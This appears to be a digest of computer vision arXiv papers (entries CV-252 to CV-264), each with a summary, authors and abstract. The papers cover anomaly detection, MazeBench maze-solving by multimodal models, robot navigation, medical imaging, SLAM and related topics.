Abstract:Micro-expression recognition is vital for affective computing but remains challenging due to the extremely brief, low-intensity facial motions involved and the high-dimensional nature of 4D mesh data. To address these challenges, we introduce a dual-view optical flow approach that simplifies mesh processing by capturing each micro-expression sequence from two synchronized viewpoints and computing optical flow to represent motion. Our pipeline begins with view separation and sequence-wise face cropping to ensure spatial consistency, followed by automatic apex-frame detection based on peak motion intensity in both views. We decompose each sequence into onset-apex and apex-offset phases, extracting horizontal, vertical, and magnitude flow channels for each phase. These are fed into our Triple-Stream MicroAttNet, which employs a fusion attention module to adaptively weight modality-specific features and a squeeze-and-excitation block to enhance magnitude representations. Training uses focal loss to mitigate class imbalance and the Adam optimizer with early stopping. Evaluated on the multi-label 4DME dataset, comprising 24 subjects and five emotion categories, in the 4DMR IJCAI Workshop Challenge 2025, our method achieves a macro-UF1 score of 0.536, outperforming the official baseline by over 50% and securing first place. Ablation studies confirm that both the fusion attention and SE components each contribute up to 3.6 points of UF1 gain. These results demonstrate that dual-view, phase-aware optical flow combined with multi-stream fusion yields a robust and interpretable solution for 4D micro-expression recognition.
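The per-phase inputs reduce to simple flow arithmetic: the horizontal and vertical components u and v plus the magnitude sqrt(u^2 + v^2) that the SE block later re-weights, with the apex frame picked where mean motion peaks. A toy sketch (all values are illustrative, not from the dataset):

```python
import numpy as np

# The three flow channels used per phase (toy 2x2 flow field).
u = np.array([[0.3, -0.4], [0.0, 1.0]])   # horizontal flow
v = np.array([[0.4,  0.3], [0.0, 0.0]])   # vertical flow
mag = np.sqrt(u**2 + v**2)                # magnitude channel

# Apex-frame detection: the frame whose mean motion intensity peaks.
frame_motion = [0.1, 0.7, 0.3]            # mean |flow| for 3 frames (toy)
apex = int(np.argmax(frame_motion))

print(mag[0, 0], apex)  # ~0.5, apex frame 1
```

Splitting at the apex then yields the onset-apex and apex-offset pairs whose (u, v, mag) channels feed the three network streams.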
[CV-252] VAN-AD: Visual Masked Autoencoder with Normalizing Flow For Time Series Anomaly Detection
Quick Read: This paper addresses the limited generalization of existing time series anomaly detection (TSAD) methods, which train a separate model per dataset and therefore perform poorly in scenarios with scarce training data. The key to the solution is VAN-AD, a novel framework built on a visual Masked Autoencoder (MAE) pretrained on ImageNet, with two core components: an Adaptive Distribution Mapping Module (ADMM) that maps MAE reconstructions into a unified statistical space to amplify discrepancies caused by abnormal patterns, and a Normalizing Flow Module (NFM) that combines the MAE with normalizing flows to estimate the probability density of the current window under the global distribution, improving local perception. Experiments on nine real-world datasets show that VAN-AD consistently outperforms state-of-the-art methods.
Link: https://arxiv.org/abs/2603.26842
Authors: PengYu Chen, Shang Wan, Xiaohou Shi, Yuan Chang, Yan Sun, Sajal K. Das
Affiliations: Beijing University of Posts and Telecommunications; China Telecom Research Institute; Missouri University of Science and Technology
Subjects: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV)
Comments: 13 pages, 20 figures
Abstract:Time series anomaly detection (TSAD) is essential for maintaining the reliability and security of IoT-enabled service systems. Existing methods require training one specific model for each dataset, which exhibits limited generalization capability across different target datasets, hindering anomaly detection performance in various scenarios with scarce training data. To address this limitation, foundation models have emerged as a promising direction. However, existing approaches either repurpose large language models (LLMs) or construct largescale time series datasets to develop general anomaly detection foundation models, and still face challenges caused by severe cross-modal gaps or in-domain heterogeneity. In this paper, we investigate the applicability of large-scale vision models to TSAD. Specifically, we adapt a visual Masked Autoencoder (MAE) pretrained on ImageNet to the TSAD task. However, directly transferring MAE to TSAD introduces two key challenges: overgeneralization and limited local perception. To address these challenges, we propose VAN-AD, a novel MAE-based framework for TSAD. To alleviate the over-generalization issue, we design an Adaptive Distribution Mapping Module (ADMM), which maps the reconstruction results before and after MAE into a unified statistical space to amplify discrepancies caused by abnormal patterns. To overcome the limitation of local perception, we further develop a Normalizing Flow Module (NFM), which combines MAE with normalizing flow to estimate the probability density of the current window under the global distribution. Extensive experiments on nine real-world datasets demonstrate that VAN-AD consistently outperforms existing state-of-the-art methods across multiple evaluation metrics. We make our code and datasets available at this https URL.
[CV-253] From Pixels to BFS: High Maze Accuracy Does Not Imply Visual Planning
Quick Read: This paper asks whether multimodal models possess genuine planning ability on visual spatial tasks or merely complete them by brute-force search in token space. The key to the solution is MazeBench, a benchmark of 110 procedurally generated maze images, used to systematically evaluate 16 model configurations from OpenAI, Anthropic, Google, and Alibaba. Although models such as GPT-5.4 and Gemini 3.1 Pro score well (91% and 79% respectively), they actually translate the image into a text grid and enumerate paths step by step, consuming 1,710-22,818 tokens per solve, far less efficiently than humans; without added reasoning budgets, accuracy collapses to 2-12%, and on ultra-hard mazes they fail by hitting token limits. Ablations further show the bottleneck is weak visual extraction rather than downstream search: given the correct grid directly, Claude Sonnet 4.6 jumps from 6% to 80% accuracy. Even when explicitly forbidden to construct grids or perform graph search, models revert to the same enumeration strategy, indicating that current multimodal models lack genuine human-like spatial understanding.
Link: https://arxiv.org/abs/2603.26839
Authors: Alberto G. Rodriguez Salgado
Affiliations: OpenAI; Anthropic; Google; Alibaba
Subjects: Machine Learning (cs.LG); Computer Vision and Pattern Recognition (cs.CV)
Comments: 15 pages, 10 figures. Code and mazes available at this https URL
Abstract:How do multimodal models solve visual spatial tasks – through genuine planning, or through brute-force search in token space? We introduce MazeBench, a benchmark of 110 procedurally generated maze images across nine controlled groups, and evaluate 16 model configurations from OpenAI, Anthropic, Google, and Alibaba. GPT-5.4 solves 91% and Gemini 3.1 Pro 79%, but these scores are misleading: models typically translate images into text grids and then enumerate paths step by step, consuming 1,710–22,818 tokens per solve for a task humans do quickly. Without added reasoning budgets, all configurations score only 2–12%; on 20x20 ultra-hard mazes, they hit token limits and fail. Qualitative traces reveal a common two-stage strategy: image-to-grid translation followed by token-level search, effectively BFS in prose. A text-grid ablation shows Claude Sonnet 4.6 rising from 6% on images to 80% when given the correct grid, isolating weak visual extraction from downstream search. When explicitly instructed not to construct a grid or perform graph search, models still revert to the same enumeration strategy. MazeBench therefore shows that high accuracy on visual planning tasks does not imply human-like spatial understanding.
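For contrast with the thousands of tokens the models spend, the "BFS in prose" they emulate is a few lines of actual code over a grid maze (0 = free, 1 = wall):

```python
from collections import deque

def bfs_path_length(grid, start, goal):
    """Shortest 4-connected path length in a grid maze, or -1 if unreachable."""
    rows, cols = len(grid), len(grid[0])
    q = deque([(start, 0)])
    seen = {start}
    while q:
        (r, c), d = q.popleft()
        if (r, c) == goal:
            return d
        for dr, dc in ((1, 0), (-1, 0), (0, 1), (0, -1)):
            nr, nc = r + dr, c + dc
            if 0 <= nr < rows and 0 <= nc < cols \
                    and grid[nr][nc] == 0 and (nr, nc) not in seen:
                seen.add((nr, nc))
                q.append(((nr, nc), d + 1))
    return -1

maze = [[0, 0, 1],
        [1, 0, 1],
        [1, 0, 0]]
print(bfs_path_length(maze, (0, 0), (2, 2)))  # 4
```

The benchmark's point is precisely this asymmetry: once the grid is known, the search is trivial; the models' failure mode is extracting the grid from pixels, not the search itself.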
[CV-254] SpatialAnt: Autonomous Zero-Shot Robot Navigation via Active Scene Reconstruction and Visual Anticipation
Quick Read: This paper addresses a challenge that current zero-shot Vision-and-Language Navigation (VLN) methods face in real robot deployment: they rely on high-quality human-crafted scene reconstructions, whereas in practice a robot must build its own priors through autonomous pre-exploration, and such self-built reconstructions are inevitably incomplete and noisy, severely degrading methods that depend on reconstruction quality. The key to the proposed SpatialAnt framework lies in two innovations: a physical grounding strategy that recovers the absolute metric scale of monocular reconstructions, and a novel visual anticipation mechanism that renders future observations from the noisy point clouds, enabling the agent to perform counterfactual reasoning and prune paths that contradict human instructions, thereby navigating robustly without high-quality reconstructions.
Link: https://arxiv.org/abs/2603.26837
Authors: Jiwen Zhang, Xiangyu Shi, Siyuan Wang, Zerui Li, Zhongyu Wei, Qi Wu
Affiliations: unknown
Subjects: Robotics (cs.RO); Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV)
Comments: 10 pages, 4 figures, 5 tables. Homepage: this https URL
Abstract:Vision-and-Language Navigation (VLN) has recently benefited from Multimodal Large Language Models (MLLMs), enabling zero-shot navigation. While recent exploration-based zero-shot methods have shown promising results by leveraging global scene priors, they rely on high-quality human-crafted scene reconstructions, which are impractical for real-world robot deployment. When encountering an unseen environment, a robot should build its own priors through pre-exploration. However, these self-built reconstructions are inevitably incomplete and noisy, which severely degrade methods that depend on high-quality scene reconstructions. To address these issues, we propose SpatialAnt, a zero-shot navigation framework designed to bridge the gap between imperfect self-reconstructions and robust execution. SpatialAnt introduces a physical grounding strategy to recover the absolute metric scale for monocular-based reconstructions. Furthermore, rather than treating the noisy self-reconstructed scenes as absolute spatial references, we propose a novel visual anticipation mechanism. This mechanism leverages the noisy point clouds to render future observations, enabling the agent to perform counterfactual reasoning and prune paths that contradict human instructions. Extensive experiments in both simulated and real-world environments demonstrate that SpatialAnt significantly outperforms existing zero-shot methods. We achieve a 66% Success Rate (SR) on R2R-CE and 50.8% SR on RxR-CE benchmarks. Physical deployment on a Hello Robot further confirms the efficiency and efficacy of our framework, achieving a 52% SR in challenging real-world settings.
[CV-255] Envisioning global urban development with satellite imagery and generative AI
Quick Read: This paper addresses the fact that traditional urban-development research treats city evolution as a prediction task, overlooking its generative nature. The key to the solution is a multimodal generative AI framework whose core innovation is integrating text prompts with geospatial controls to generate high-fidelity, diverse, and realistic satellite imagery for the world's 500 largest metropolitan areas. The framework lets users specify development goals to generate scenarios aligned with their intent, supports urban redevelopment practice by learning from the surrounding environment, and uses latent representations to transfer styles of urban environments across a global spatial network of cities and to enhance downstream tasks such as carbon-emission prediction.
Link: https://arxiv.org/abs/2603.26831
Authors: Kailai Sun, Yuebing Liang, Mingyi He, Yunhan Zheng, Alok Prakash, Shenhao Wang, Jinhua Zhao, Alex "Sandy" Pentland
Affiliations: unknown
Subjects: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
Comments:
Abstract:Urban development has been a defining force in human history, shaping cities for centuries. However, past studies mostly analyze such development as predictive tasks, failing to reflect its generative nature. Therefore, this study designs a multimodal generative AI framework to envision sustainable urban development at a global scale. By integrating prompts and geospatial controls, our framework can generate high-fidelity, diverse, and realistic urban satellite imagery across the 500 largest metropolitan areas worldwide. It enables users to specify urban development goals, creating new images that align with them while offering diverse scenarios whose appearance can be controlled with text prompts and geospatial constraints. It also facilitates urban redevelopment practices by learning from the surrounding environment. Beyond visual synthesis, we find that it encodes and interprets latent representations of urban form for global cross-city learning, successfully transferring styles of urban environments across a global spatial network. The latent representations can also enhance downstream prediction tasks such as carbon emission prediction. Further, human expert evaluation confirms that our generated urban images are comparable to real urban images. Overall, this study presents innovative approaches for accelerated urban planning and supports scenario-based planning processes for worldwide cities.
[CV-256] Central-to-Local Adaptive Generative Diffusion Framework for Improving Gene Expression Prediction in Data-Limited Spatial Transcriptomics
Quick Read: This paper addresses the scarcity of Spatial Transcriptomics (ST) data caused by high cost, low throughput, and limited data sharing, which constrains the development of robust computational models. The key to the solution is the proposed Central-to-Local adaptive generative diffusion framework for ST (C2L-ST): a global central model is first pretrained on large-scale histopathology image datasets to learn transferable morphological representations, and institution-specific local models are then adapted through a lightweight gene-conditioned modulation mechanism using only a small number of paired image-gene spots. This strategy synthesizes realistic, molecularly consistent histology patches under data-limited conditions, significantly improving the accuracy and spatial coherence of downstream gene-expression prediction while requiring only a fraction of sampled spots to approach real-data performance.
Link: https://arxiv.org/abs/2603.26827
Authors: Yaoyu Fang, Jiahe Qian, Xinkun Wang, Lee A. Cooper, Bo Zhou
Affiliations: Northwestern University
Subjects: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV)
Comments: 31 pages, 12 figures, under review
Abstract:Spatial Transcriptomics (ST) provides spatially resolved gene expression profiles within intact tissue architecture, enabling molecular analysis in histological context. However, the high cost, limited throughput, and restricted data sharing of ST experiments result in severe data scarcity, constraining the development of robust computational models. To address this limitation, we present a Central-to-Local adaptive generative diffusion framework for ST (C2L-ST) that integrates large-scale morphological priors with limited molecular guidance. A global central model is first pretrained on extensive histopathology datasets to learn transferable morphological representations, and institution-specific local models are then adapted through lightweight gene-conditioned modulation using a small number of paired image-gene spots. This strategy enables the synthesis of realistic and molecularly consistent histology patches under data-limited conditions. The generated images exhibit high visual and structural fidelity, reproduce cellular composition, and show strong embedding overlap with real data across multiple organs, reflecting both realism and diversity. When incorporated into downstream training, synthetic image-gene pairs improve gene expression prediction accuracy and spatial coherence, achieving performance comparable to real data while requiring only a fraction of sampled spots. C2L-ST provides a scalable and data-efficient framework for molecular-level data augmentation, offering a domain-adaptive and generalizable approach for integrating histology and transcriptomics in spatial biology and related fields.
[CV-257] arg-VU: Affordance Reasoning with Physics-Aware 3D Geometry for Visual Understanding in Robotic Surgery
Quick Read: This paper addresses the unclear link between perception and action in surgical robotics, where tissues are highly deformable, compliant, and dynamically coupled with instrument motion, leaving no effective way to fuse physical constraints with visual understanding for affordance reasoning. The key to the proposed arg-VU framework is combining temporally consistent geometry tracking (from 3D Gaussian Splatting reconstructions) with constraint-induced mechanical modeling via Extended Position-Based Dynamics (XPBD), yielding representative geometry points (RGPs) whose sensitivity to local deformation constraints defines anisotropic stiffness metrics reflecting the local constraint-manifold geometry. Robot tool poses in SE(3) are then incorporated to compute rigidly induced displacements at the RGPs, from which two complementary measures are derived: a physics-aware compliance energy that evaluates mechanical feasibility under local deformation constraints, and a positional agreement score that captures motion alignment (serving as a kinematic baseline). The approach produces more stable, physically consistent, and interpretable affordance reasoning for deformable surgical environments, supporting embodied robotic interaction.
Link: https://arxiv.org/abs/2603.26814
Authors: Nan Xiao, Yunxin Fan, Farong Wang, Fei Liu
Affiliations: University of Tennessee, Knoxville, TN, USA; Stanford University, Palo Alto, CA, USA
Subjects: Computer Vision and Pattern Recognition (cs.CV); Robotics (cs.RO)
Comments:
Abstract:Affordance reasoning provides a principled link between perception and action, yet remains underexplored in surgical robotics, where tissues are highly deformable, compliant, and dynamically coupled with tool motion. We present arg-VU, a physics-aware affordance reasoning framework that integrates temporally consistent geometry tracking with constraint-induced mechanical modeling for surgical visual understanding. Surgical scenes are reconstructed using 3D Gaussian Splatting (3DGS) and converted into a temporally tracked surface representation. Extended Position-Based Dynamics (XPBD) embeds local deformation constraints and produces representative geometry points (RGPs) whose constraint sensitivities define anisotropic stiffness metrics capturing the local constraint-manifold geometry. Robotic tool poses in SE(3) are incorporated to compute rigidly induced displacements at RGPs, from which we derive two complementary measures: a physics-aware compliance energy that evaluates mechanical feasibility with respect to local deformation constraints, and a positional agreement score that captures motion alignment (as kinematic motion baseline). Experiments on surgical video datasets show that arg-VU yields more stable, physically consistent, and interpretable affordance predictions than kinematic baselines. These results demonstrate that physics-aware geometric representations enable reliable affordance reasoning for deformable surgical environments and support embodied robotic interaction.
[CV-258] Implicit neural representations for larval zebrafish brain microscopy: a reproducible benchmark on the MapZebrain atlas
【Quick Read】: This paper addresses the lack of a reproducible evaluation standard for implicit neural representations (INRs) on high-resolution larval zebrafish microscopy, in particular for preserving neuropil boundaries and fine neuronal processes. The key contribution is a reproducible INR benchmark for the MapZebrain larval zebrafish brain atlas: under a unified, seed-controlled protocol, four INR approaches (SIREN, Fourier features, Haar positional encoding, and a multi-resolution grid) are systematically compared on 950 grayscale microscopy images. With per-image percentile-based normalization and a deterministic 40% column-wise hold-out, the results show that Haar and Fourier encodings achieve the best macro-averaged reconstruction fidelity (about 26 dB) and edge preservation, outperforming the smoother-biased SIREN, while SIREN remains competitive on area-weighted micro averages and suits background modelling or denoising. This indicates that explicit spectral and multiscale encodings better capture fine neuroanatomical detail and guides the choice of INR for atlas registration, label transfer, and morphology-preserving sharing in MapZebrain workflows.
Link: https://arxiv.org/abs/2603.26811
Authors: Agnieszka Pregowska
Affiliations: unknown
Subjects: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI); Machine Learning (cs.LG); Neurons and Cognition (q-bio.NC)
Comments:
Abstract:Implicit neural representations (INRs) offer continuous coordinate-based encodings for atlas registration, cross-modality resampling, sparse-view completion, and compact sharing of neuroanatomical data. Yet reproducible evaluation is lacking for high-resolution larval zebrafish microscopy, where preserving neuropil boundaries and fine neuronal processes is critical. We present a reproducible INR benchmark for the MapZebrain larval zebrafish brain atlas. Using a unified, seed-controlled protocol, we compare SIREN, Fourier features, Haar positional encoding, and a multi-resolution grid on 950 grayscale microscopy images, including atlas slices and single-neuron projections. Images are normalized with per-image (1,99) percentiles estimated from 10% of pixels in non-held-out columns, and spatial generalization is tested with a deterministic 40% column-wise hold-out along the X-axis. Haar and Fourier achieve the strongest macro-averaged reconstruction fidelity on held-out columns (about 26 dB), while the grid is moderately behind. SIREN performs worse in macro averages but remains competitive on area-weighted micro averages in the all-in-one regime. SSIM and edge-focused error further show that Haar and Fourier preserve boundaries more accurately. These results indicate that explicit spectral and multiscale encodings better capture high-frequency neuroanatomical detail than smoother-bias alternatives. For MapZebrain workflows, Haar and Fourier are best suited to boundary-sensitive tasks such as atlas registration, label transfer, and morphology-preserving sharing, while SIREN remains a lightweight baseline for background modelling or denoising.
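As a reference point for the encodings compared above, a random Fourier feature mapping, one of the four INR inputs in the benchmark, can be sketched in a few lines of NumPy. This is a generic illustration rather than the benchmark's implementation; the band count, frequency scale, and seed are illustrative choices.

```python
import numpy as np

def fourier_features(coords, num_bands=4, scale=1.0):
    """Map 2D coordinates in [0, 1] to random Fourier features.

    coords: (N, 2) array; returns (N, 4 * num_bands) sinusoidal features.
    """
    rng = np.random.default_rng(0)  # seed-controlled, in the spirit of the protocol
    B = rng.normal(0.0, scale, size=(coords.shape[1], 2 * num_bands))
    proj = 2.0 * np.pi * coords @ B              # (N, 2 * num_bands)
    return np.concatenate([np.sin(proj), np.cos(proj)], axis=-1)

# Encode a tiny 4x4 pixel-coordinate grid, as a coordinate MLP would receive it.
ys, xs = np.meshgrid(np.linspace(0, 1, 4), np.linspace(0, 1, 4), indexing="ij")
grid = np.stack([ys.ravel(), xs.ravel()], axis=-1)  # (16, 2)
feats = fourier_features(grid, num_bands=4)          # (16, 16)
```

An MLP trained on `feats` can fit high-frequency image detail that a raw-coordinate MLP, with its smoothness bias, tends to miss, which is consistent with the benchmark's finding that explicit spectral encodings preserve boundaries better.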
[CV-259] Unblur-SLAM: Dense Neural SLAM for Blurry Inputs CVPR2026
【Quick Read】: This paper tackles the difficulty conventional RGB SLAM systems have with accurate pose estimation and sharp 3D reconstruction under motion blur and defocus blur. The key is a staged deblurring SLAM framework, Unblur-SLAM: the first stage applies a feed-forward image deblurring model to input frames, with a tailored training scheme that improves both the tracking and mapping modules. Frames that are successfully deblurred obtain refined poses and depth via local-global multi-view optimization and loop closure; frames that fail the first stage are instead modeled directly through a global 3DGS representation plus an additional blur network that represents multiple blurred sub-frames and simulates the blur formation process, learning sharp details and refined sub-frame poses and thereby achieving robust, high-quality reconstruction.
Link: https://arxiv.org/abs/2603.26810
Authors: Qi Zhang, Denis Rozumny, Francesco Girlanda, Sezer Karaoglu, Marc Pollefeys, Theo Gevers, Martin R. Oswald
Affiliations: University of Amsterdam; ETH Zürich; Meta Reality Labs
Subjects: Computer Vision and Pattern Recognition (cs.CV); Image and Video Processing (eess.IV)
Comments: 14 pages, 9 figures. Accepted by CVPR 2026
Abstract:We propose Unblur-SLAM, a novel RGB SLAM pipeline for sharp 3D reconstruction from blurred image inputs. In contrast to previous work, our approach is able to handle different types of blur and demonstrates state-of-the-art performance in the presence of both motion blur and defocus blur. Moreover, we adjust the computation effort with the amount of blur in the input image. As a first stage, our method uses a feed-forward image deblurring model for which we propose a suitable training scheme that can improve both tracking and mapping modules. Frames that are successfully deblurred by the feed-forward network obtain refined poses and depth through local-global multi-view optimization and loop closure. Frames that fail the first stage deblurring are directly modeled through the global 3DGS representation and an additional blur network to model multiple blurred sub-frames and simulate the blur formation process in 3D space, thereby learning sharp details and refined sub-frame poses. Experiments on several real-world datasets demonstrate consistent improvements in both pose estimation and sharp reconstruction results of geometry and texture.
[CV-260] The Language of Touch: Translating Vibrations into Text with Dual-Branch Learning
【Quick Read】: This paper addresses the semantic understanding of vibrotactile signals, introducing for the first time the task of vibrotactile captioning, i.e., generating natural language descriptions from tactile signals. The core challenges are the hybrid periodic-aperiodic structure of tactile data and its lack of spatial semantics. The key is the proposed ViPAC (Vibrotactile Periodic-Aperiodic Captioning) method: a dual-branch architecture disentangles periodic and aperiodic components, a dynamic fusion mechanism adaptively integrates their features, and an orthogonality constraint with weighting regularization ensures feature complementarity and fusion consistency, markedly improving the lexical accuracy and semantic alignment of the generated captions.
Link: https://arxiv.org/abs/2603.26804
Authors: Jin Chen, Yifeng Lin, Chao Zeng, Si Wu, Tiesong Zhao
Affiliations: Fuzhou University; Fujian Science and Technology Innovation Laboratory for Optoelectronic Information of China; Hubei University; South China University of Technology
Subjects: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
Comments: 9 pages, 6 figures
Abstract:The standardization of vibrotactile data by IEEE P1918.1 workgroup has greatly advanced its applications in virtual reality, human-computer interaction and embodied artificial intelligence. Despite these efforts, the semantic interpretation and understanding of vibrotactile signals remain an unresolved challenge. In this paper, we make the first attempt to address vibrotactile captioning, i.e., generating natural language descriptions from vibrotactile signals. We propose Vibrotactile Periodic-Aperiodic Captioning (ViPAC), a method designed to handle the intrinsic properties of vibrotactile data, including hybrid periodic-aperiodic structures and the lack of spatial semantics. Specifically, ViPAC employs a dual-branch strategy to disentangle periodic and aperiodic components, combined with a dynamic fusion mechanism that adaptively integrates signal features. It also introduces an orthogonality constraint and weighting regularization to ensure feature complementarity and fusion consistency. Additionally, we construct LMT108-CAP, the first vibrotactile-text paired dataset, using GPT-4o to generate five constrained captions per surface image from the popular LMT-108 dataset. Experiments show that ViPAC significantly outperforms the baseline methods adapted from audio and image captioning, achieving superior lexical fidelity and semantic alignment.
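The orthogonality constraint and the gated fusion described above can be sketched with plain NumPy. This is a hypothetical illustration of the idea, not ViPAC's actual loss or fusion module; the feature shapes, the fixed gate `w`, and the function names are invented for the example.

```python
import numpy as np

def orthogonality_penalty(f_per, f_aper, eps=1e-8):
    """Mean squared cosine similarity between paired branch features.

    Driving this toward zero pushes the periodic and aperiodic branches
    to encode complementary (near-orthogonal) information.
    """
    num = np.sum(f_per * f_aper, axis=-1)
    den = np.linalg.norm(f_per, axis=-1) * np.linalg.norm(f_aper, axis=-1) + eps
    return float(np.mean((num / den) ** 2))

def dynamic_fusion(f_per, f_aper, w):
    """Convex gate: w in [0, 1] weights the periodic branch.

    (In the real model the gate would be learned and input-dependent;
    it is a fixed scalar here for illustration.)
    """
    return w * f_per + (1.0 - w) * f_aper

rng = np.random.default_rng(0)
a = rng.normal(size=(8, 16))              # stand-in periodic-branch features
b = rng.normal(size=(8, 16))              # stand-in aperiodic-branch features
pen_random = orthogonality_penalty(a, b)  # small: random vectors are near-orthogonal
pen_self = orthogonality_penalty(a, a)    # ~1: identical features, maximal penalty
fused = dynamic_fusion(a, b, w=0.5)
```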
[CV-261] Deep Learning Aided Vision System for Planetary Rovers
【Quick Read】: This paper addresses the coordination of high-precision real-time perception and offline terrain reconstruction for planetary rovers in complex lunar environments, in support of autonomous navigation and mission planning. The key is a dual-module vision system: the real-time module combines CLAHE-enhanced stereo imagery, YOLOv11n object detection, and a neural network for object distance estimation, providing reliable metric context; the offline module generates depth maps with the Depth Anything V2 monocular depth estimation model and fuses them into dense point clouds via Open3D for high-quality terrain reconstruction. The architecture balances computational efficiency with perception accuracy and robustness on lunar scenes, maintaining solid detection performance and depth accuracy on grayscale imagery (median depth error of 2.26 cm within the 1 to 10 meter range).
Link: https://arxiv.org/abs/2603.26802
Authors: Lomash Relia, Jai G Singla, Amitabh, Nitant Dube
Affiliations: unknown
Subjects: Computer Vision and Pattern Recognition (cs.CV); Robotics (cs.RO); Image and Video Processing (eess.IV)
Comments:
Abstract:This study presents a vision system for planetary rovers, combining real-time perception with offline terrain reconstruction. The real-time module integrates CLAHE enhanced stereo imagery, YOLOv11n based object detection, and a neural network to estimate object distances. The offline module uses the Depth Anything V2 metric monocular depth estimation model to generate depth maps from captured images, which are fused into dense point clouds using Open3D. Real world distance estimates from the real time pipeline provide reliable metric context alongside the qualitative reconstructions. Evaluation on Chandrayaan 3 NavCam stereo imagery, benchmarked against a CAHV based utility, shows that the neural network achieves a median depth error of 2.26 cm within a 1 to 10 meter range. The object detection model maintains a balanced precision recall tradeoff on grayscale lunar scenes. This architecture offers a scalable, compute-efficient vision solution for autonomous planetary exploration.
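The headline benchmark figure above, a median depth error within a fixed working range, corresponds to a simple evaluation routine. A minimal sketch, with made-up depth values standing in for NavCam-derived estimates and CAHV reference depths:

```python
import numpy as np

def median_depth_error_cm(pred_m, ref_m, lo=1.0, hi=10.0):
    """Median absolute depth error in cm, restricted to a working range.

    pred_m: estimated depths in meters; ref_m: reference depths in meters.
    Only points whose reference depth lies in [lo, hi] meters are counted,
    mirroring the 1 to 10 meter evaluation range. Illustrative code only.
    """
    mask = (ref_m >= lo) & (ref_m <= hi)
    return float(np.median(np.abs(pred_m[mask] - ref_m[mask])) * 100.0)

# Hypothetical values: 0.5 m and 15.0 m fall outside the evaluation range.
ref = np.array([0.5, 2.0, 4.0, 8.0, 15.0])
pred = np.array([0.9, 2.03, 3.98, 8.01, 14.0])
err_cm = median_depth_error_cm(pred, ref)   # median of {3, 2, 1} cm -> 2 cm
```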
[CV-262] PhyDCM: A Reproducible Open-Source Framework for AI-Assisted Brain Tumor Classification from Multi-Sequence MRI
【Quick Read】: This paper addresses the inefficiency of conventional diagnostic approaches under rapidly growing medical imaging data volumes, and the poor reproducibility and limited academic extensibility of existing deep learning solutions built on closed architectures. The key is PhyDCM, an open-source software framework centered on a MedViT-based hybrid classification architecture, integrated with a standardized DICOM processing pipeline and an interactive desktop visualization interface. A modular design separates computational logic from the graphical interface so that components can be modified and extended independently, while standardized preprocessing (intensity rescaling and limited data augmentation) ensures consistency across MRI acquisition settings. Experiments on several public datasets show stable classification accuracy above 93%, providing a solid foundation for reproducible AI-driven medical image analysis.
Link: https://arxiv.org/abs/2603.26794
Authors: Hayder Saad Abdulbaqi, Mohammed Hadi Rahim, Mohammed Hassan Hadi, Haider Ali Aboud, Ali Hussein Allawi
Affiliations: unknown
Subjects: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
Comments: 18 pages, 9 figures, 6 tables
Abstract:MRI-based medical imaging has become indispensable in modern clinical diagnosis, particularly for brain tumor detection. However, the rapid growth in data volume poses challenges for conventional diagnostic approaches. Although deep learning has shown strong performance in automated classification, many existing solutions are confined to closed technical architectures, limiting reproducibility and further academic development. PhyDCM is introduced as an open-source software framework that integrates a hybrid classification architecture based on MedViT with standardized DICOM processing and an interactive desktop visualization interface. The system is designed as a modular digital library that separates computational logic from the graphical interface, allowing independent modification and extension of components. Standardized preprocessing, including intensity rescaling and limited data augmentation, ensures consistency across varying MRI acquisition settings. Experimental evaluation on MRI datasets from BRISC2025 and curated Kaggle collections (FigShare, SARTAJ, and Br35H) demonstrates stable diagnostic performance, achieving over 93% classification accuracy across categories. The framework supports structured, exportable outputs and multi-planar reconstruction of volumetric data. By emphasizing transparency, modularity, and accessibility, PhyDCM provides a practical foundation for reproducible AI-driven medical image analysis, with flexibility for future integration of additional imaging modalities.
[CV-263] Elucidating the Design Space of Flow Matching for Cellular Microscopy
【Quick Read】: This paper addresses the underexplored design space of flow-matching generative models for simulating cellular responses to biological perturbations, where several commonly used techniques turn out to be unnecessary or even harmful to performance. The key is a systematic analysis and simplification of the model design that yields a simple, stable, and scalable training recipe; scaling the model two orders of magnitude beyond prior methods delivers a two-fold FID and ten-fold KID improvement, and fine-tuning with pre-trained molecular embeddings achieves state-of-the-art performance in simulating responses to unseen molecules.
Link: https://arxiv.org/abs/2603.26790
Authors: Charles Jones, Emmanuel Noutahi, Jason Hartford, Cian Eastwood
Affiliations: unknown
Subjects: Computer Vision and Pattern Recognition (cs.CV)
Comments:
Abstract:Flow-matching generative models are increasingly used to simulate cell responses to biological perturbations. However, the design space for building such models is large and underexplored. We systematically analyse the design space of flow matching models for cell-microscopy images, finding that many popular techniques are unnecessary and can even hurt performance. We develop a simple, stable, and scalable recipe which we use to train our foundation model. We scale our model to two orders of magnitude larger than prior methods, achieving a two-fold FID and ten-fold KID improvement over prior methods. We then fine-tune our model with pre-trained molecular embeddings to achieve state-of-the-art performance simulating responses to unseen molecules. Code is available at this https URL.
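For orientation, the core flow-matching regression target common to this model family can be written down directly. A minimal sketch assuming the linear (rectified-flow style) interpolation path; the paper explores a much larger design space than this single choice:

```python
import numpy as np

def flow_matching_pair(x0, x1, t):
    """Linear-interpolation flow matching: x_t = (1 - t) * x0 + t * x1.

    Returns the interpolated state x_t and the regression target
    v* = x1 - x0, which a velocity network v_theta(x_t, t) is trained
    to predict with mean squared error.
    """
    t = t.reshape(-1, *([1] * (x0.ndim - 1)))  # broadcast time over pixel dims
    x_t = (1.0 - t) * x0 + t * x1
    v_target = x1 - x0
    return x_t, v_target

rng = np.random.default_rng(0)
x0 = rng.normal(size=(4, 8, 8))   # noise samples
x1 = rng.normal(size=(4, 8, 8))   # stand-in "cell image" samples
t = rng.uniform(size=4)
x_t, v = flow_matching_pair(x0, x1, t)

# Loss of a trivial zero predictor, as a placeholder for v_theta(x_t, t).
loss = float(np.mean((np.zeros_like(v) - v) ** 2))
```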
[CV-264] Confidence Matters: Uncertainty Quantification and Precision Assessment of Deep Learning-based CMR Biomarker Estimates Using Scan-rescan Data
